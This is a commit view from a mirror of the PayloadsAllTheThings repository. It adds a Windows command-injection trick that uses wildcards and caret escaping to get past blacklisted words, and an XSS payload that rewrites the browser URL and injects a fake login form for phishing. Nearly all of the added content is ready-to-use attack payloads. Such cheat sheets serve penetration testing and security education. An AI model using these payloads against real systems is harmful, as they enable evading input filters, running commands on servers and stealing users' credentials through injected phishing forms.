ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-07 07:22:13 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Windows RCE wildcard + XSS UI redressing

Browse Source
This commit is contained in:
Swissky 2019-01-08 20:49:05 +01:00
parent 2e3aef1a19
commit ea0bddc18a
2 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Remote commands execution/README.md
View File

@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
cat ${test//hh??hm/} cat ${test//hh??hm/}
``` ```
Bypass blacklisted word with wildcards
```powershell
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```
Bypass zsh/bash/sh blacklist Bypass zsh/bash/sh blacklist
```powershell ```powershell

9
XSS injection/README.md
View File

@ -33,6 +33,15 @@ fclose($fp);
?> ?>
``` ```
UI redressing (Sophisticated phishing)
```html
<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>
```
Keylogger for XSS Keylogger for XSS
```javascript ```javascript